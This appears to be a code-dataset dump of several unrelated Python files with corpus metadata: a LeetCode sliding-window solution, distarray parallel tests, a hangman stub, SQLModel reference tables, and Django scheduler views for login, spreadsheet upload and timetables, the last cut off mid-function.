src_path = os.path.join(data_raw_path, "msmt17_raw", src_folder, label, name)
dir_path = os.path.join(data_raw_path, section, label)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
dst_path = os.path.join(dir_path, name)
copyfile(src_path, dst_path)
| en | 0.863174 | # Folder which contains 'msmt17_raw' folder which contains list_train.txt, list_val.txt, # list_query.txt, list_gallery.txt files and train, test folders with images # Processing train and test | 2.589037 | 3
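# Optional sanity check, a sketch rather than part of the original script:
# count identities and images per processed section after copying.
for section in ("train", "val", "gallery", "query"):
    section_dir = os.path.join(data_raw_path, section)
    labels = os.listdir(section_dir)
    n_images = sum(len(os.listdir(os.path.join(section_dir, label)))
                   for label in labels)
    print(f"{section}: {len(labels)} identities, {n_images} images")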
Ninja/Leetcode/76_Minimum_Window_Substring.py | cyandterry/Python-Study | 61 | 6616833 |
"""
Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).
For example,
S = "ADOBECODEBANC"
T = "ABC"
Minimum window is "BANC".
Note:
If there is no such window in S that covers all characters in T, return the empty string "".
If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.
"""
class Solution:
# @return a string
def minWindow(self, S, T):
N = len(S)
M = len(T)
wanted = {}
found = {}
for char in T:
wanted[char] = wanted.get(char, 0) + 1
found[char] = 0
l = 0
res = ''
counter = 0
for r in range(N):
if S[r] not in wanted:
continue
found[S[r]] += 1
if found[S[r]] <= wanted[S[r]]:
counter += 1
if counter == M:
while l < r:
if S[l] not in wanted:
l += 1
continue
if found[S[l]] > wanted[S[l]]:
found[S[l]] -= 1
l += 1
continue
break
if not res or len(res) > r - l + 1:
res = S[l:r+1]
return res
# Note
# 1. Prepare the two dicts (wanted and found)
# 2. Skip chars that we don't care, increase right bound
# 3. If current window contains all the chars we want(counter == M), stop and resize left bound
# 4. Skip chars that we don't care. If extra chars in found > wanted, skip them
# 5. break here
# 6. Calculate the current size
| """
Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).
For example,
S = "ADOBECODEBANC"
T = "ABC"
Minimum window is "BANC".
Note:
If there is no such window in S that covers all characters in T, return the emtpy string "".
If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.
"""
class Solution:
# @return a string
def minWindow(self, S, T):
N = len(S)
M = len(T)
wanted = {}
found = {}
for char in T:
wanted[char] = wanted.get(char, 0) + 1
found[char] = 0
l = 0
res = ''
counter = 0
for r in range(N):
if S[r] not in wanted:
continue
found[S[r]] += 1
if found[S[r]] <= wanted[S[r]]:
counter += 1
if counter == M:
while l < r:
if S[l] not in wanted:
l += 1
continue
if found[S[l]] > wanted[S[l]]:
found[S[l]] -= 1
l += 1
continue
break
if not res or len(res) > r - l + 1:
res = S[l:r+1]
return res
# Note
# 1. Prepare for wo dict
# 2. Skip chars that we don't care, increase right bound
# 3. If current window contains all the chars we want(counter == M), stop and resize left bound
# 4. Skip chars that we don't care. If extra chars in found > wanted, skip them
# 5. break here
# 6. Calculate the current size | en | 0.836386 | Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n). For example, S = "ADOBECODEBANC" T = "ABC" Minimum window is "BANC". Note: If there is no such window in S that covers all characters in T, return the emtpy string "". If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S. # @return a string # Note # 1. Prepare for wo dict # 2. Skip chars that we don't care, increase right bound # 3. If current window contains all the chars we want(counter == M), stop and resize left bound # 4. Skip chars that we don't care. If extra chars in found > wanted, skip them # 5. break here # 6. Calculate the current size | 3.918517 | 4 |
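# Usage example taken from the problem statement above.
print(Solution().minWindow("ADOBECODEBANC", "ABC"))  # -> BANC
print(Solution().minWindow("A", "B"))                # -> "" (no such window)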
distarray/localapi/tests/paralleltest_localarray.py | sjperkins/distarray | 66 | 6616834 |
# encoding: utf-8
# ---------------------------------------------------------------------------
# Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc.
# Distributed under the terms of the BSD License. See COPYING.rst.
# ---------------------------------------------------------------------------
import unittest
import numpy as np
from numpy.testing import assert_array_equal
from distarray import utils
from distarray.testing import (ParallelTestCase, assert_localarrays_allclose,
assert_localarrays_equal)
from distarray.localapi.localarray import LocalArray, ndenumerate, ones
from distarray.localapi.maps import Distribution
from distarray.localapi.error import InvalidDimensionError, IncompatibleArrayError
class TestInit(ParallelTestCase):
"""Is the __init__ method working properly?"""
def setUp(self):
self.dist_1d = Distribution.from_shape(comm=self.comm,
shape=(7,), grid_shape=(4,))
self.larr_1d = LocalArray(self.dist_1d, buf=None)
self.dist_2d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), grid_shape=(4, 1))
self.larr_2d = LocalArray(self.dist_2d, buf=None)
def test_basic_1d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_1d.global_shape, (7,))
self.assertEqual(self.larr_1d.dist, ('b',))
self.assertEqual(self.larr_1d.grid_shape, (4,))
self.assertEqual(self.larr_1d.comm_size, 4)
self.assertTrue(self.larr_1d.comm_rank in range(4))
self.assertEqual(len(self.larr_1d.distribution), 1)
self.assertEqual(self.larr_1d.global_shape, (7,))
if self.larr_1d.comm_rank == 3:
self.assertEqual(self.larr_1d.local_shape, (1,))
else:
self.assertEqual(self.larr_1d.local_shape, (2,))
self.assertEqual(self.larr_1d.ndarray.shape, self.larr_1d.local_shape)
self.assertEqual(self.larr_1d.ndarray.size, self.larr_1d.local_size)
self.assertEqual(self.larr_1d.local_size, self.larr_1d.local_shape[0])
self.assertEqual(self.larr_1d.ndarray.dtype, self.larr_1d.dtype)
def test_basic_2d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.dist, ('b', 'b'))
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.comm_size, 4)
self.assertTrue(self.larr_2d.comm_rank in range(4))
self.assertEqual(len(self.larr_2d.distribution), 2)
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.local_shape, (4, 16))
self.assertEqual(self.larr_2d.local_size,
np.array(self.larr_2d.local_shape).prod())
self.assertEqual(self.larr_2d.ndarray.shape, self.larr_2d.local_shape)
self.assertEqual(self.larr_2d.ndarray.size, self.larr_2d.local_size)
self.assertEqual(self.larr_2d.ndarray.dtype, self.larr_2d.dtype)
def test_localarray(self):
"""Can the ndarray be set and get?"""
self.larr_2d.ndarray
la = np.random.random(self.larr_2d.local_shape)
la = np.asarray(la, dtype=self.larr_2d.dtype)
self.larr_2d.ndarray = la
self.larr_2d.ndarray
def test_bad_localarray(self):
""" Test that setting a bad local array fails as expected. """
self.larr_1d.ndarray
local_shape = self.larr_1d.local_shape
# Double dimension sizes to make an invalid shape.
bad_shape = tuple(2 * size for size in local_shape)
la = np.random.random(bad_shape)
la = np.asarray(la, dtype=self.larr_1d.dtype)
with self.assertRaises(ValueError):
self.larr_1d.ndarray = la
def test_cart_coords(self):
"""Test getting the cart_coords attribute"""
actual_1d = self.larr_1d.cart_coords
expected_1d = tuple(self.larr_1d.distribution.cart_coords)
self.assertEqual(actual_1d, expected_1d)
actual_2d = self.larr_2d.cart_coords
expected_2d = tuple(self.larr_2d.distribution.cart_coords)
self.assertEqual(actual_2d, expected_2d)
class TestLocalInd(ParallelTestCase):
"""Test the computation of local indices."""
def test_block_simple(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (4, 4))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (1, 4))
row_result = [(0, 0), (0, 1), (0, 2), (0, 3)]
row = la.comm_rank
calc_row_result = [la.local_from_global((row, col)) for col in
range(la.global_shape[1])]
self.assertEqual(row_result, calc_row_result)
def test_block_complex(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(8, 2))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (1, 0), (1, 1)]
elif la.comm_rank == 1:
gis = [(2, 0), (2, 1), (3, 0), (3, 1)]
elif la.comm_rank == 2:
gis = [(4, 0), (4, 1), (5, 0), (5, 1)]
elif la.comm_rank == 3:
gis = [(6, 0), (6, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
def test_cyclic_simple(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10,), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (10,))
self.assertEqual(la.grid_shape, (4,))
if la.comm_rank == 0:
gis = (0, 4, 8)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 1:
gis = (1, 5, 9)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 2:
gis = (2, 6)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
elif la.comm_rank == 3:
gis = (3, 7)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
self.assertEqual(result, calc_result)
def test_cyclic_complex(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 2), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (4, 0), (4, 1)]
elif la.comm_rank == 1:
gis = [(1, 0), (1, 1), (5, 0), (5, 1)]
elif la.comm_rank == 2:
gis = [(2, 0), (2, 1), (6, 0), (6, 1)]
elif la.comm_rank == 3:
gis = [(3, 0), (3, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
class TestGlobalInd(ParallelTestCase):
"""Test the computation of global indices."""
def round_trip(self, la):
for indices in utils.multi_for([range(s) for s in la.local_shape]):
gi = la.global_from_local(indices)
li = la.local_from_global(gi)
self.assertEqual(li, indices)
def test_block(self):
"""Can we go from global to local indices and back for block?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.round_trip(la)
def test_cyclic(self):
"""Can we go from global to local indices and back for cyclic?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 8), dist=('c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_crazy(self):
"""Can we go from global to local indices and back for a complex case?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10, 100, 20),
dist=('b', 'c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_global_limits_block(self):
"""Find the boundaries of a block distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
answers = [(0, 3), (4, 7), (8, 11), (12, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
def test_global_limits_cyclic(self):
"""Find the boundaries of a cyclic distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('c', 'n'))
a = LocalArray(d)
answers = [(0, 12), (1, 13), (2, 14), (3, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
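    # Under a cyclic distribution over 4 ranks, rank r owns global rows
    # r, r + 4, r + 8 and r + 12, so its dimension-0 limits are (r, r + 12),
    # matching the answers above.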
def test_bad_global_limits(self):
""" Test that invalid global_limits fails as expected. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
a = LocalArray(d)
with self.assertRaises(InvalidDimensionError):
a.global_limits(-1)
class TestRankCoords(ParallelTestCase):
""" Test the rank <--> coords methods. """
def round_trip(self, la, rank):
""" Test that given a rank, we can get the coords,
and then get back to the same rank. """
coords = la.coords_from_rank(rank)
# I am not sure what to expect for specific values for coords.
# Therefore the specific return value is not checked.
rank2 = la.rank_from_coords(coords)
self.assertEqual(rank, rank2)
def test_rank_coords(self):
""" Test that we can go from rank to coords and back. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(d)
max_size = self.comm.Get_size()
for rank in range(max_size):
self.round_trip(la, rank=rank)
class TestArrayConversion(ParallelTestCase):
""" Test array conversion methods. """
def setUp(self):
# On Python3, an 'int' gets converted to 'np.int64' on copy,
# so we force the numpy type to start with so we get back
# the same thing.
self.int_type = np.int64
self.distribution = Distribution.from_shape(comm=self.comm,
shape=(4,))
self.int_larr = LocalArray(self.distribution, dtype=self.int_type)
self.int_larr.fill(3)
def test_astype(self):
""" Test that astype() works as expected. """
# Convert int array to float.
float_larr = self.int_larr.astype(float)
for global_inds, value in ndenumerate(float_larr):
self.assertEqual(value, 3.0)
self.assertTrue(isinstance(value, float))
# No type specification for a copy.
# Should get same type as we started with.
int_larr2 = self.int_larr.astype(None)
for global_inds, value in ndenumerate(int_larr2):
self.assertEqual(value, 3)
self.assertTrue(isinstance(value, self.int_type))
class TestIndexing(ParallelTestCase):
def test_indexing_0(self):
"""Can we get and set local elements for a simple dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
for global_inds, value in ndenumerate(a):
b.global_index[global_inds] = a.global_index[global_inds]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_indexing_1(self):
"""Can we get and set local elements for a complex dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for i, value in ndenumerate(a):
a.global_index[i] = 0.0
for i, value in ndenumerate(a):
b.global_index[i] = a.global_index[i]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_pack_unpack_index(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
packed_ind = a.pack_index(global_inds)
self.assertEqual(global_inds, a.unpack_index(packed_ind))
class TestSlicing(ParallelTestCase):
comm_size = 2
def test_slicing(self):
distribution = Distribution.from_shape(self.comm,
(16, 16),
dist=('b', 'n'))
a = ones(distribution)
if self.comm.Get_rank() == 0:
dd00 = {"dist_type": 'b',
"size": 5,
"start": 0,
"stop": 3,
"proc_grid_size": 2,
"proc_grid_rank": 0}
dd01 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd00, dd01])
rvals = a.global_index.get_slice((slice(5, None), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((3, 16)))
elif self.comm.Get_rank() == 1:
dd10 = {"dist_type": 'b',
"size": 5,
"start": 3,
"stop": 5,
"proc_grid_size": 2,
"proc_grid_rank": 1}
dd11 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd10, dd11])
rvals = a.global_index.get_slice((slice(None, 10), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((2, 16)))
class TestLocalArrayMethods(ParallelTestCase):
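    # Per-rank dim_data for a 2 x 2 process grid: entry i describes the
    # block-cyclic ('c' with block_size) piece owned by comm rank i along
    # each of the two dimensions.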
ddpr = [
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
})
]
def test_copy_bn(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution, dtype=np.int_)
a.fill(11)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_copy_cbc(self):
distribution = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(distribution, dtype=np.int_)
a.fill(12)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_astype_bn(self):
new_dtype = np.float32
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d, dtype=np.int_)
a.fill(11)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_astype_cbc(self):
new_dtype = np.int8
d = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(d, dtype=np.int32)
a.fill(12)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_asdist_like(self):
"""Test asdist_like for success and failure."""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
b = LocalArray(d)
new_a = a.asdist_like(b)
self.assertEqual(id(a), id(new_a))
d2 = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
a = LocalArray(d)
b = LocalArray(d2)
self.assertRaises(IncompatibleArrayError, a.asdist_like, b)
class TestComm(ParallelTestCase):
def test_create_localarray(self):
# regression test for issue #144
dist = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
la = LocalArray(dist)
class TestNDEnumerate(ParallelTestCase):
"""Make sure we generate indices compatible with __getitem__."""
def test_ndenumerate(self):
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(d)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
        pass
04_05_hangman_play.py | bolivaralejandro/prog_pi_ed2- | 26 | 6616835 | #04_05_hangman_play
import random
words = ['chicken', 'dog', 'cat', 'mouse', 'frog']
lives_remaining = 14
def play():
word = pick_a_word()
while True:
guess = get_guess(word)
if process_guess(guess, word):
print('You win! Well Done!')
break
if lives_remaining == 0:
print('You are Hung!')
print('The word was: ' + word)
break
def pick_a_word():
return random.choice(words)
def get_guess(word):
return 'a'
def process_guess(guess, word):
global lives_remaining
lives_remaining = lives_remaining -1
return False
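# NOTE: get_guess() and process_guess() above are deliberate stubs for this
# step of the exercise -- every guess is 'a' and always costs a life. A later
# step would presumably flesh them out roughly like this sketch (not the
# book's exact code):
#
#     def get_guess(word):
#         return input('Guess a letter: ')
#
#     def process_guess(guess, word):
#         global lives_remaining
#         if guess in word:
#             return True  # a full version would track revealed letters
#         lives_remaining = lives_remaining - 1
#         return False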
play()
backend/project/app/core/reference.py | goodyttoor/tcl_v7 | 0 | 6616836 | from datetime import datetime
from typing import Optional
from fastapi import APIRouter
from sqlmodel import Field, SQLModel
router = APIRouter()
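# NOTE: `router` is created here but no endpoints are registered in this
# module. A minimal read-only endpoint over one of the lookup tables below
# might look like this sketch (`get_session` is a hypothetical dependency,
# not something defined in this project):
#
#     from fastapi import Depends
#     from sqlmodel import Session, select
#
#     @router.get("/rights")
#     def list_rights(session: Session = Depends(get_session)):
#         return session.exec(select(Right)).all()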
class Right(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Province(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Amphoe(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
province_id: int
name: str
class Tambon(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
amphoe_id: int
name: str
class Religion(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class National(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Occupation(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class MaritalStatus(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class AcademicDegree(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Allergy(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Vehicle(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Language(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Relationship(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class IdType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class FeedbackType(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class VisibilityLevel(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
class Module(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
updated_by: Optional[int] = None
class ModuleFunction(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
detail: str
created_at: datetime
updated_at: datetime
created_by: int
    updated_by: Optional[int] = None
scheduler/views.py | MarynaSavchenko/zielbruks | 0 | 6616837 |
"""Views gathering point"""
import os.path
from datetime import datetime
from wsgiref.util import FileWrapper
import pandas as pd
from django.contrib.auth import authenticate, login as log
from django.core.files.storage import default_storage
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.template import loader
from django.utils.datastructures import MultiValueDictKeyError
from xlrd import XLRDError
import scheduler.import_handlers as imp
from scheduler.calendar_util import get_start_date, generate_conflicts_context, \
generate_full_schedule_context, generate_full_index_context_with_date, get_group_colors, \
get_rooms_colors, generate_full_index_context, generate_context_for_conflicts_report
from scheduler.conflicts_checker import db_conflicts
from scheduler.model_util import get_professor, get_room, get_group
from scheduler.models import Room, Lesson, Group, Conflict, Professor, Student
from scheduler.export_handlers import export_to_csv, export_to_excel
from .forms import SelectRoomForm, SelectProfessorForm, SelectGroupForm, \
EditForm, MassEditForm, LoginForm, ExportForm
def login(request: HttpRequest) -> HttpResponse:
"""Render the login page"""
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['login']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
if user.is_superuser:
log(request, user)
# Redirect to a success page.
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
context = {'error': "Incorrect login or password", 'form': form}
return render(request, 'login.html', context)
return render(request, 'login.html', context={"form": form})
context = {'form': LoginForm()}
return render(request, 'login.html', context)
def index(request: HttpRequest) -> HttpResponse:
"""Render the main page"""
context: dict = {}
context.update(generate_conflicts_context())
context.update(generate_full_schedule_context())
context['form'] = MassEditForm()
return render(request, 'index.html', context)
def index_specific(request: HttpRequest, date: str) -> HttpResponse:
    """Render the main page for the given date"""
    date_as_datetime = datetime.strptime(date, '%Y-%m-%d')
    context = generate_full_index_context_with_date(date_as_datetime)
    form = MassEditForm()
    context.update({'form': form})
    return render(request, 'index.html', context)
def upload_schedule(request: HttpRequest) -> HttpResponse:
"""Render schedule upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
                    # Read back from where the file was actually saved; the
                    # stored name can differ from file.name on collisions.
                    data = pd.read_csv(default_storage.path(filename))
                elif ext == '.xlsx':
                    data = pd.read_excel(default_storage.path(filename))
else:
return render(request, "upload_schedule.html",
{'error': "Error: Extension not supported"})
added_lessons, incorrect, duplicate = imp.parse_data(data, ext)
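                # Highlight rejected rows (lightcoral) and duplicate rows
                # (lightblue) in the HTML preview built below.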
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
context = {'loaded_data': data_html, 'added': added_lessons}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_schedule.html", context)
def upload_students(request: HttpRequest) -> HttpResponse:
"""Render students upload page"""
filename = None
context: dict = {}
try:
if request.method == 'POST' and request.FILES['uploaded_file']:
file = request.FILES['uploaded_file']
if isinstance(file.name, str):
filename = default_storage.save(file.name, file)
ext = os.path.splitext(file.name)[1]
if ext == '.csv':
                    # Read back from where the file was actually saved; the
                    # stored name can differ from file.name on collisions.
                    data = pd.read_csv(default_storage.path(filename))
                elif ext == '.xlsx':
                    data = pd.read_excel(default_storage.path(filename))
else:
return render(request, "upload_students.html",
{'error': "Error: Extension not supported"})
                added_students, incorrect, duplicate = imp.import_students(data)
data_html = data.style \
.set_table_attributes('class="table table-striped table-hover table-bordered"')\
.apply(lambda x: [('background: lightcoral' if x.name in incorrect else
('background: lightblue' if x.name in duplicate else ''))
for _ in x], axis=1) \
.render()
db_conflicts()
                context = {'loaded_data': data_html, 'added': added_students}
except MultiValueDictKeyError:
context = {'error': "Error: You didn't select a file"}
except XLRDError:
context = {'error': "Error: Corrupted file"}
except UnicodeDecodeError:
context = {'error': "Error: File contains weird symbols"}
except imp.ImportSizeException:
context = {'error': "Error: Incorrect number of columns"}
finally:
if filename:
default_storage.delete(filename)
return render(request, "upload_students.html", context)
def show_conflicts(request: HttpRequest) -> HttpResponse:
"""Render the conflicts page"""
template = loader.get_template('conflicts.html')
context = generate_conflicts_context()
return HttpResponse(template.render(context, request))
def show_rooms_schedule(request: HttpRequest) -> HttpResponse:
"""Render the room schedule page"""
if request.method == 'POST':
form = SelectRoomForm(request.POST)
if form.is_valid():
room = form.cleaned_data['room']
room_number = room.number
room_lessons_query = Lesson.objects.filter(room=room)
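            # Build the event tuples the calendar template expects:
            # (start, end, lesson name, group, room number, professor,
            #  room color, group color, lesson id, time label).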
room_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
room_number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in room_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(room_lessons_list),
'type': 'room',
'name': room_number,
'events': room_lessons_list,
'start_date': get_start_date(room_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "room_schedule.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "room_schedule.html", context={'form': SelectRoomForm()})
def show_professors_schedule(request: HttpRequest) -> HttpResponse:
"""Render the professor schedule page"""
if request.method == 'POST':
form = SelectProfessorForm(request.POST)
if form.is_valid():
professor = form.cleaned_data['professor']
professors_lessons_query = Lesson.objects.filter(professor=professor)
professors_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
q.end_time.isoformat(timespec='seconds'),
q.name,
Group.objects.filter(id=q.group_id)[:1].get().name,
Room.objects.filter(id=q.room_id)[:1]
.get().number,
(q.professor.name + " " + q.professor.surname),
q.room_color,
q.group_color,
q.id,
q.start_time.strftime("%H:%M") + "-"
+ q.end_time.strftime("%H:%M"))
for q in professors_lessons_query]
context = {
'form': form,
'chosen_flag': True,
'events_flag': bool(professors_lessons_list),
'events': professors_lessons_list,
'type': 'professor',
'name': professor,
'lessons': Lesson.objects.all(),
'start_date': get_start_date(professors_lessons_query),
"groups_colors": get_group_colors(),
"rooms_colors": get_rooms_colors(),
}
return render(request, "professors_scheduler.html", context)
return HttpResponse("AN ERROR OCCURRED")
return render(request, "professors_scheduler.html", context={'form': SelectProfessorForm()})
def show_groups_schedule(request: HttpRequest) -> HttpResponse:
"""Render the group schedule page"""
if request.method == 'POST':
form = SelectGroupForm(request.POST)
if form.is_valid():
group = form.cleaned_data['group']
groups_lessons_query = Lesson.objects.filter(group=group)
groups_lessons_list = [(q.start_time.isoformat(timespec='seconds'),
